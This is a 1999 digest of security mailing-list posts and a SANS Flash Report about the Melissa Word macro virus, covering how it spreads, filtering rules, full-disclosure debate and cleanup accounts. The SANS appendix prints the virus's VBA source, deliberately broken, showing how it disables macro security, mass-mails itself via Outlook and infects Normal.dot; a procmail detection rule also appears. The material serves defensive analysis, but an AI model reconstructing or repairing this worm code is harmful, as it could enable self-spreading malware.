        subscribe list-name 
  e.g., subscribe ciac-bulletin 

You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email.  This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.

If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins.  If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.

This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

J-026: HP-UX rpc.pcnfsd Vulnerability
J-027: Digital Unix  Vulnerabilities ( at , inc  )
J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
J-029: Buffer Overflows in Various FTP Servers
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services


-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5.2

iQCVAwUBNv07sLnzJzdsy3QZAQEZjwQA6+nHONNAmoosXGsy9eJ6nuIPlFNQ3nM9
+XN1vnqBNI9Hp3kBIXtPXywY4W19NQbyyax6YI+ugmmNfNPEdefeHqnNGuz3dqcW
Ce2RQWnPB1dRrUBTorU+cZHsaq+qaX4s2jSNFlJCFeSuUjNYhzVI6HHilhvGZCQI
wuSjLbuYabo=
=KVaC
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 18:12:54 -0500 (EST)
From: Greg A. Woods <woods@most.weird.com>
Reply-To: Phil-Sec@datasys.net
To: Phil-Sec@datasys.net
Subject: RE: Phil-Sec: `Good Times', come to life: Melissa

[ On Sunday, March 28, 1999 at 16:49:49 (-0500), ROD VERNEN wrote: ]
> Subject: RE: Phil-Sec: `Good Times', come to life: Melissa
>
> Good points. But WinWord can be configured to require confirmation
> before executing a macro.  This is an area where user education is
> critical...

The Melissa "virus" isn't just an ordinary "word processor" macro but
rather a Visual BASIC Application extension thing that gets run by the
application when the document is open.  According to CERT neither Word97
nor Word2000 list the macro when an infected document is opened with
macros disabled, even if you explicitly look for macros -- i.e. you can
only see the macro if you let it execute.  This is absurdly stupid.

(And of course what's also insidious, and new to me, about this "virus" is
that it immediately and silently disables the feature which would
normally require confirmation before executing macros, thus opening up
the door for its simpler bretheren, so to speak.)

-- 
                                                        Greg A. Woods

+1 416 218-0098      VE3TCP      <gwoods@acm.org>      <robohack!woods>
Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com>

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 21:58:17 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Malicious code detection and full disclosure

I have been getting a lot of flames and veiled threats from individuals
and "virus researchers" for posting the code yesterday.  There seems to be
a lot of misinformation going around so I wanted to clarify the situation.
These people are all producing the same arguments:

1.  "Posting the source allows someone to know how to write a Macro virus"

Yes, and anyone of the 100,000 or more people who got the virus the other
day can buy VB and do File->Open and see the source.  Repeat after me:
"Word macros are INTERPRETED".  All symbol information is present.  No
decompilation necessary.

2.  "By reformatting the source, you have created a new variant"

What?  Your virus scanner could be thwarted by adding whitespace?  Someone
has a problem but it isn't me.  Perhaps you'd best learn from the sandbox
mechanisms of Java or virus scanners like F-PROT.  A virus is not a virus
because it has the string "By 3le3t3 DudEZ" followed by three tabs.  It is
a virus because it does things like update Normal.dot.  Repeat after me:
"Pattern matching alone does not a virus scanner make".  Just as in the
recent thread about security scanners doing version-checking instead of
exploiting a hole, the best answer is to use a combination of techniques
to identify flaws or malicious code and then notify the user of any
uncertainties in the detection mechanism.

A perfect parallel to this is the Internet worm.  We were reminded of that
time as we paused the Exchange SMTP service to keep the program from
spreading.  Also, it was important to quickly analyze the program, making
sure it did nothing malicious like mailing a person's files to another
location.  After doing this, I believed the code itself would help others
do the same if they needed to.  An important note is that the Symantec and
McAfee web pages describing the virus both left out important information
(for instance, avertlabs.com neglected to mention the active document and
Normal.dot file infection).  If I had made any mistakes in my analysis,
another could have determined this for himself.

A good reference is the paper "With Microscope and Tweezers, An Analysis
of the Internet Worm" by Mark Eichin and Jon Rochlis.  It can be found at:

    http://www.mit.edu:8001/people/eichin/www/virus/main.html

In short, this is the same full disclosure vs. security through obscurity
debate.  Make your own decision what is appropriate; my mind has been made
up in regards to this for at least a decade.  Viruses tend to be
uninventive and boring.  This one was extremely unsophisticated, exploited
no new holes, and required user carelessness to spread.  I only got
involved because I had to help fend off the nuisance Friday.  I hope
everyone found the postings useful and will demand better virus protection
than string matching from their virus scanner vendor as well as request
that Microsoft add more virus prevention than "enable macros? yes/no" and
disallow macros from doing things like sending mail or writing to files
without notice to the user.

-Nate

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 20:12:22 -0800
From: John D. Hardin <jhardin@wolfenet.com>
To: BUGTRAQ@netspace.org
Subject: Re: Blocking the Melissa Trojan

On Sat, 27 Mar 1999, Brett Glass wrote:

>At 03:28 PM 3/27/99 -0800, John D. Hardin wrote:
>>On Sat, 27 Mar 1999, Brett Glass wrote:
>>
>>> Excellent. Is there a default "poisoned executables" file in the
>>> package? Or do admins have to construct a list themselves?
>>
>>They have to make it themselves if they wish to use the facility. The
>>web page has a suggested list of filenames.
>
> Sounds good. Now, for the next twist to the story.
>
> It turns out that the Melissa code also infects NORMAL.DOT, so that
> the computer starts producing infected documents. When one of those
> documents hits a machine that hasn't been infected yet, that machine
> sends out a barrage of e-mail.... Using the NEW document as the
> attachment! It'll have a different name.  So, we also need to filter
> by subject and body.

That's a job that regular procmail is well suited to. If the subject
is fixed (hang on, reading bugtraq...)

Per Aleph1:
 The subject line is "important Message From <some user name>". The
 body consist of the text "Here is that document you asked for...
 don't show anyone else;-)".

That's fairly simple...

:0 H
* ^Subject:.*important Message From
{
  :0 B
  * Here is that document you asked for
  * don't show anyone else
  * ^Content-.*: .*\.do[ct]
  {
    LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '

    :0
    security-quarantine
  }
}

--
 John Hardin KA7OHZ                               jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  In the Lion
  the Mighty Lion
  the Zebra sleeps tonight...
  Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
   52 days until Star Wars episode I

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:16:29 +0000
From: Vesselin Bontchev <bontchev@COMPLEX.IS>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)

Aaron Wood writes (my comments are on Trend's press release forwarded by
him):

> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.

In Word 2000, the virus disables the Tools/Macro/Security menu.

> The name of the original infected attachment was List.doc, but it
> could be any name.

Theoretically, yes. But keep in mind, that the virus sends itself by
e-mail only when it infects a clean system. What it sends, is the
document which as infected the system. Originally, the virus was
distributed in a file named LIST.DOC and posted to alt.sex by a person
known to have posted new viruses to the newsgroups before. So, in most
cases this is the document which infects the systems for the first time
and it is what is sent around. The only way to begin sending something
else is if you get infected by opening another user's infected document
which you have received by other means (i.e., not by the virus sending
it to you).

> If the user does not have Outlook, the virus will not work.

That's not true - the virus works perfectly, in the sense that it
replicates and infects. It just can't send itself around in e-mail
attachments. But, as we know, this is by far not the only way a virus
can use to spread. :-)

Another thing - the virus never terminates the copy of Outlook it starts
- at least not explicitly. I haven't verified that, but if that copy
really remains in memory, opening several infected documents would
eventually slow down and crash your system - because of the many copies
of Outlook running in the background. The virus starts Outlook each time
you open an infected document - although it sends itself by e-mail only
if the system wasn't already infected.

> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.

"File" here means "whatever is not infected - either the active document
or the normal template".

> Trend Micro has detection for this virus in its latest pattern update,

Most anti-virus producers have. The update for our product (F-PROT and
F-MACROW) can be found at the usual place:

        ftp://ftp.complex.is/pub/macrdef2.zip

Regards,
Vesselin
--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
Postholf 7180, IS-127, Reykjavik, Iceland               producers of F-PROT.
e-mail: bontchev@complex.is, tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44  E5 F7 C3 18 EA 2B AE 4E

----------------------------------------------------------------------------

Date: Mon, 29 Mar 1999 14:46:24 -0500 (EST)
From: sans@clark.net
Subject: EXTRA: SANS Flash Report on the Melissa Virus

Once or twice a year, the magnitude of a security event is great enough
to merit a SANS Flash Report.  It is amazing and coincidental that it
happens in the same 24 hour period that we send out the first SANS
Newsbites.

NOTE:  SANS will be changing email and web servers this week.  We hope
to avoid service interruptions, but some error might creep in.  Problems
to <kolstad@delos.com>.

Table of Contents:
  1.  What Melissa teaches us
  1.1 Infection Speed
  1.2 Collateral Damage
  1.3 Need for Defense in Depth
  2.  One site's experience in cleaning up after a Melissa infestation
  3.  Conclusion
  Appendix: Melissa Source Code

You will already have heard of the Melissa virus, at least from the SANS
Newsbites, and probably also from newspapers and friends, as well. An
excellent description of the virus, including how to identify it and
contain it at the host level, was developed by the Computer Emergency
Response Team at Carnegie Mellon University.  This document is available
at:  http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html .

The major anti-virus vendors have already released descriptions and
anti-viral signatures.  URLs for NAI and Symantec are listed below:
 http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
 http://www.symantec.com/avcenter/venc/data/mailissa.html

The rapid response of these organizations has been very impressive, and
your response should be equally rapid.  If you have not yet taken the
steps described in the CERT advisory, follow the instructions referenced
above and get your site's virus signatures updated and the infected
machines contained and cleaned.  Then read the rest of this document
that tells some of the lessons learned and also the bigger picture
surrounding the Melissa Macro virus.  We discuss the implications of
information gathering viruses like Melissa, the process and impact of
cleaning up after an outbreak at a military site and finally, share a
non-working version of the code to help you understand what these viruses
do.

1. What Melissa teaches us

1.1 Infection Speed

According to NAI's web site listed above, the virus was first discovered
on an "alt.sex" newsgroup and spread rapidly. On the same day the virus
was first discovered "in the wild" it caused major infections and reports
>from a large number of Department of Defense and Department of Energy
sites.  Many of you will probably find out today that your site has been
infected as well.  This serves as a warning how fast a virus with an
unknown signature can spread.  A modified, non-operative copy of the
source code is included as an appendix to this document.  If you search
the listing for the string "For y = 1 To", you can see how the virus
replicated so rapidly by going through Microsoft Outlook address books
and sending itself to the first 50 entries in each book.  Sections in
the code that have been the subject of news reports are marked with
comments that begin with ***.

Useful Background Information: In the March 2nd SANS First Tuesday
Intrusion Detection Web Broadcast, archived at
http://www.sans.org/webarchives.htm, Stephen Northcutt described another
MS Word Macro Virus, M97.Marker.a.  Marker is an information gathering
virus which uses FTP to send the Microsoft Office registration information
of infected systems to outside organizations.  Northcutt described how
this same technique would allow a prospective attack to develop an
infection map and by knowing who sends what to whom, to target future
attacks.

1.2 Collateral Damage

The Melissa virus apparently does not create any other damage in the
sense of deleting, or stealing files.  However, when the smoke clears,
the cost of dealing with Melissa will be measured in the millions of
dollars.  It also directly affects sites' ability to send and receive
email.  One network engineer, who worked at one of the first sites to
report the problem last Friday March 26, said "I knew something was
wrong before I knew what was wrong.  I could feel the network going
slower and slower.  As I looked into it, I found the exchange mail
servers were melting down." One of the lessons of Melissa is that a
macro virus can hit very fast and very hard.  The engineer went on to
say, "As I composed the last email of the day, a message hit the Inbox
of my Microsoft Outlook email application.  The subject line read:
"Important Message From [Jane Doe]".  I viewed the message, and the body
read "Here is that document you asked for... don't show anyone else ;-)"
Attached was a Microsoft Word document titled "list1.doc".

"Although I hadn't requested any documents from [Jane Doe], I was
expecting a couple of them from other people.  It wasn't inconceivable
to think that she had become involved, even though I didn't know who
she was.  I double-clicked on the Word document. A pop-up window appeared,
warning me that a macro was contained in the document, and that macros
can potentially be dangerous.  I knew that... :-)  So, I shut down the
Word application, and checked the document with several of the virus
detection packages that I had.  Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted
source, I went ahead and opened the document with the macros enabled.
In less than a second, a duplicate of the message had hit my mailbox,
this time with my name attached. I hit the power-off button on my
computer, but it was late.  The payload had been delivered.  My name
was now attached to a file containing pornographic web sites, and an
apparent username and password for each site.  Moments later, duplicate
messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This
virus (or worm) was snowballing fast, too fast.  I immediately called
our information systems security manager, only to find that his phone
was already busy.  I left a voicemail detailing my appraisal of the
situation, and my fear that this incident could get serious... very
quickly.  What I didn't know was that I was too late, it was already
*very* serious."

1.3 Need for Defense in Depth

Though Melissa is primarily spread by e-mail, passing an infected floppy
disk works just as well to move the virus to a new system, possibly even
a new organization.  If there was ever any doubt about whether we need
to take virus countermeasures seriously, that time is past.  We recommend
virus scanning at the firewall, on servers, and on the desktop systems
as well as physical entry points for magnetic media for sites that want
to avoid the kind of punch Melissa exhibited.

2. One site's experience in cleaning up after a Melissa infestation

Here's a first-person description of the process one site used to clean
up after being hit by Melissa.

"As soon as we discovered the virus late Friday afternoon, we disconnected
our servers (all SMTP relays and Exchange servers at our Internet
connection) from the network until we could contain the infection. This
happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange
servers worked through Friday night and well into Saturday. Many returned
Saturday and again on Sunday to complete the isolation and cleanup. They
cleaned up the Exchange servers with updated anti-viral signatures as
soon as they were available. The corporate servers and one departmental
server were ready to come back on-line late Sunday. We left IMS (Internet
Mail Service) disabled until we could contain (filter) email at the SMTP
server.

"Our version of sendmail is one removed from the latest and filter
updates provided by the author would not work on our version. We resorted
to getting the word out for ALL users to update the AV signatures and
refrain from sending Word docs until any with macros had been identified
as coming from trusted sources. The administrator for the SMTP relay
host downloaded a trial version of InterScan VirusWall from TrendMicro.
For more info, see:  http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many
things in our favor:
* System administrators were still at work when the problem started
  (approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the
  problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained
  in incident handling based on the SANS' Incident Handling Step by Step
  approach.
* The person who needed to make key decisions was trained in incident
  response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported
  the Incident Handling team by not directing what needed to be done (at
  least so far)."

Note: The stages of incident handling are: preparation, identification,
containment, eradication, and follow-up.  The URLs at the beginning of
this document can help you with identification and eradication.  Your
organization may need to consider email server down time in order to
achieve containment.  You may also want to consider setting up non-email
communication channels for your organization.  If you do not know how
to build a telephone call tree, look for a "soccer mom".  They know how
to spread important information very efficiently.  In this way, if you
do suffer an email meltdown, you can still get important information,
such as where to acquire the latest anti-virus software, to your users.

3. Conclusion

Because Melissa exploits one of the most valuable benefits of the net
-- the ability to share documents -- to propagate and to multiply itself,
it will affect far more people far more quickly than earlier viruses.
The silver lining in this cloud is that a relatively benign virus like
Melissa is a low-cost way of gaining user awareness.  That same mechanism
can be used by a more malicious attacker to make private information
public and to destroy large amounts of important data. It makes sense
for you to use this opportunity to establish three capabilities if you
have not already done so:
(1) user responsibility and active involvement in protecting their
    systems
(2) an incident handling capability (Order Incident Handling Step-by-Step
    from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say
    when they call about a security threat.

In addition, we at SANS want to hear your experiences and the lessons
you learned in responding to Melissa. Please send your Melissa-related
tips, tricks, techniques, experiences and lessons learned to info@sans.org
with Melissa in the subject line.  This type of sharing can help all
sites be in a better position to respond the next time an event like
this occurs.

Appendix: Melissa Source Code

NOTE: Several errors have been introduced into this copy of the code as
a safety measure. It will not run in this form.  We hope the code we
changed will not overly impact your opportunity to understand how the
software works, but we could not be responsible for furthering the spread
of the live version of Melissa.  Text comments have been inserted at
the "famous" locations preceded by three asterisks "***"

*** Begins by checking security, the environment, and whether already
infected

Private Sub Document_Open()
  On Error Resume Next
  If System.PrivateProfileString("",
       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
       "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("",
       "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
       "Level") = 1&
  Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
    Options.SaveNormalPrompt = (1 - 1)
  End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
    "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <>
    "... by Kwyjibo" Then
  If UngaDasOutlook = "Inlook" Then
    DasMapName.Logon "profile", "password"
    For y = 1 To DasMapName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakOffASlice.Recipients.Add Peep
            x++
            If x < 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakOffASlice.Subject = "Important Message From " &
              Application.UserName
         BreakUmOffASlice.Body =
            "Here is that document you asked for ... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From" This could
change of course in future versions ***

         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
  DasMapName.Logoff
  End If
  System.PrivateProfileString("",
      "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") =
       "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then _
    ADI1.CodeModule.DeleteLines 1, ADCL
    Set ToInfect = ADI1
    ADI1.Name = "Melissa"
    DoAD = True
  End If
  If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then _
      NTI1.CodeModule.DeleteLines 1, NTCL
      Set ToInfect = NTI1
      NTI1.Name = "Melissa"
      DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo END
      If DoNT = True Then
        Do While ADI1.CodeModule.Lines(1, 1) = ""
          ADI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
          ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
          BGN = BGN + 1
        Loop
      End If
      If DoAD = True Then
        Do While NTI1.CodeModule.Lines(1, 1) = ""
          NTI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
          ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
            BGN = BGN + 1
        Loop
      End If
CYA:
      If NTCL <> 0 And ADCL = 0 And
          (InStr(1, ActiveDocument.Name, "Document") = False) Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
      ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
        ActiveDocument.Saved = True
      End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
    plus triple-word-score, plus fifty points for using all my letters.
    Game's over.  I'm outta here."

End Sub

*** The lines above are some of the most published information about
this virus.  Though you can look for the virus with intrusion detection
and other string matching security tools by searching for keywords like
"Kwyjibo", simple modifications of the code could change these. ***

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 21:40:59 -0600
From: Simple Nomad <thegnome@NMRC.ORG>
To: BUGTRAQ@netspace.org
Subject: "Leaking" of docs via Melissa

An interesting thing -- as users are infected with Melissa some of the new
documents they create after infection become the carrier and are mailed
out. If you scan for inbound messages, it would be advised to scan for
outbound messages as well. I received a copy of an employee evaluation
>from an old client, and considering the poor rating of this guy I'd say
there's a lawsuit in the making as it apparently went not only to me but
to an internal email bulletin board.

    Simple Nomad    //
 thegnome@nmrc.org  //  ....no rest for the Wicca'd....
    www.nmrc.org    //